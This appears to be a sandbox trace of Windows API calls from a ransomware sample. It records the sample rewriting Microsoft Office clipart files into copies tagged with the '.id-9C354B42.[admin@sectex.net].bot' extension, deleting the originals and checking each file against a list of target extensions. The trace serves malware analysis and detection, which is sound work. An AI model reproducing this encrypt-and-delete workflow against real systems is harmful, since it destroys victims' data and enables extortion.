	[0148.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.528] GetLastError () returned 0x0
	[0148.528] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1cac, lpOverlapped=0x0) returned 1
	[0148.533] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1cb0, lpOverlapped=0x0) returned 1
	[0148.533] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.534] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.534] SetEndOfFile (hFile=0x384) returned 1
	[0148.534] CloseHandle (hObject=0x384) returned 1
	[0148.534] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.534] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.536] CloseHandle (hObject=0x3d0) returned 1
	[0148.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.536] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf")) returned 1
	[0148.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.537] lstrlenW (lpString=".doc") returned 4
	[0148.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.537] lstrlenW (lpString=".docx") returned 5
	[0148.537] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.537] lstrlenW (lpString=".pdf") returned 4
	[0148.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.537] lstrlenW (lpString=".xls") returned 4
	[0148.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.537] lstrlenW (lpString=".xlsx") returned 5
	[0148.537] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.537] lstrlenW (lpString=".ppt") returned 4
	[0148.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.537] lstrlenW (lpString=".zip") returned 4
	[0148.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.537] lstrlenW (lpString=".rar") returned 4
	[0148.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.537] lstrlenW (lpString=".bz2") returned 4
	[0148.538] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString=".7z") returned 3
	[0148.538] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString=".dbf") returned 4
	[0148.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString=".1cd") returned 4
	[0148.538] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString=".jpg") returned 4
	[0148.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString=".doc") returned 4
	[0148.538] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString=".docx") returned 5
	[0148.538] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.538] lstrlenW (lpString=".pdf") returned 4
	[0148.538] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString=".xls") returned 4
	[0148.538] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.538] lstrlenW (lpString=".xlsx") returned 5
	[0148.538] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.538] lstrlenW (lpString=".ppt") returned 4
	[0148.538] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.538] lstrlenW (lpString=".zip") returned 4
	[0148.538] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.538] lstrlenW (lpString=".rar") returned 4
	[0148.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.539] lstrlenW (lpString=".bz2") returned 4
	[0148.539] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.539] lstrlenW (lpString=".7z") returned 3
	[0148.539] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.539] lstrlenW (lpString=".dbf") returned 4
	[0148.539] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.539] lstrlenW (lpString=".1cd") returned 4
	[0148.539] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63
	[0148.539] lstrlenW (lpString=".jpg") returned 4
	[0148.539] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.539] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.539] lstrlenW (lpString="HH01291_.WMF") returned 12
	[0148.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.541] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=15806) returned 1
	[0148.541] CloseHandle (hObject=0x3d0) returned 1
	[0148.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf")) returned 0x20
	[0148.541] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.541] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.541] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.542] GetLastError () returned 0x0
	[0148.542] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3dbe, lpOverlapped=0x0) returned 1
	[0148.898] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3dc0, lpOverlapped=0x0) returned 1
	[0149.031] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.031] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.031] SetEndOfFile (hFile=0x384) returned 1
	[0149.034] CloseHandle (hObject=0x384) returned 1
	[0149.034] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.034] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.043] CloseHandle (hObject=0x3d0) returned 1
	[0149.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.175] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf")) returned 1
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.186] lstrlenW (lpString=".doc") returned 4
	[0149.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString=".docx") returned 5
	[0149.186] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.186] lstrlenW (lpString=".pdf") returned 4
	[0149.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString=".xls") returned 4
	[0149.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.186] lstrlenW (lpString=".xlsx") returned 5
	[0149.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.186] lstrlenW (lpString=".ppt") returned 4
	[0149.186] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.186] lstrlenW (lpString=".zip") returned 4
	[0149.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.186] lstrlenW (lpString=".rar") returned 4
	[0149.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString=".bz2") returned 4
	[0149.186] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString=".7z") returned 3
	[0149.186] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.186] lstrlenW (lpString=".dbf") returned 4
	[0149.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.186] lstrlenW (lpString=".1cd") returned 4
	[0149.186] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString=".jpg") returned 4
	[0149.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString=".doc") returned 4
	[0149.187] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString=".docx") returned 5
	[0149.187] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.187] lstrlenW (lpString=".pdf") returned 4
	[0149.187] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString=".xls") returned 4
	[0149.187] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.187] lstrlenW (lpString=".xlsx") returned 5
	[0149.187] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.187] lstrlenW (lpString=".ppt") returned 4
	[0149.187] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString=".zip") returned 4
	[0149.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.187] lstrlenW (lpString=".rar") returned 4
	[0149.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString=".bz2") returned 4
	[0149.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString=".7z") returned 3
	[0149.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString=".dbf") returned 4
	[0149.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.187] lstrlenW (lpString=".1cd") returned 4
	[0149.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63
	[0149.188] lstrlenW (lpString=".jpg") returned 4
	[0149.188] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.188] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.188] lstrlenW (lpString="HM00426_.WMF") returned 12
	[0149.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.188] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=68776) returned 1
	[0149.188] CloseHandle (hObject=0x3e4) returned 1
	[0149.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf")) returned 0x20
	[0149.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.189] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.189] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.189] GetLastError () returned 0x0
	[0149.189] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x10ca8, lpOverlapped=0x0) returned 1
	[0149.201] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x10cb0, lpOverlapped=0x0) returned 1
	[0149.203] ReadFile (in: hFile=0x3e4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.203] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.203] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.203] CloseHandle (hObject=0x3dc) returned 1
	[0149.203] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.203] SetEndOfFile (hFile=0x3e4) returned 1
	[0149.206] CloseHandle (hObject=0x3e4) returned 1
	[0149.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf")) returned 1
	[0149.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.207] lstrlenW (lpString=".doc") returned 4
	[0149.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.207] lstrlenW (lpString=".docx") returned 5
	[0149.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.207] lstrlenW (lpString=".pdf") returned 4
	[0149.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.207] lstrlenW (lpString=".xls") returned 4
	[0149.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.207] lstrlenW (lpString=".xlsx") returned 5
	[0149.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.208] lstrlenW (lpString=".ppt") returned 4
	[0149.208] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString=".zip") returned 4
	[0149.208] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.208] lstrlenW (lpString=".rar") returned 4
	[0149.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString=".bz2") returned 4
	[0149.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString=".7z") returned 3
	[0149.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString=".dbf") returned 4
	[0149.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString=".1cd") returned 4
	[0149.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString=".jpg") returned 4
	[0149.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.208] lstrlenW (lpString=".doc") returned 4
	[0149.208] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString=".docx") returned 5
	[0149.208] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.208] lstrlenW (lpString=".pdf") returned 4
	[0149.208] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.208] lstrlenW (lpString=".xls") returned 4
	[0149.208] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.209] lstrlenW (lpString=".xlsx") returned 5
	[0149.209] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.209] lstrlenW (lpString=".ppt") returned 4
	[0149.209] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.209] lstrlenW (lpString=".zip") returned 4
	[0149.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.209] lstrlenW (lpString=".rar") returned 4
	[0149.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.209] lstrlenW (lpString=".bz2") returned 4
	[0149.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.209] lstrlenW (lpString=".7z") returned 3
	[0149.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.209] lstrlenW (lpString=".dbf") returned 4
	[0149.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.209] lstrlenW (lpString=".1cd") returned 4
	[0149.209] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63
	[0149.209] lstrlenW (lpString=".jpg") returned 4
	[0149.209] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.209] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.209] lstrlenW (lpString="IN00046_.WMF") returned 12
	[0149.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.240] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1158) returned 1
	[0149.240] CloseHandle (hObject=0x3e4) returned 1
	[0149.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf")) returned 0x20
	[0149.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4
	[0149.253] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.253] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
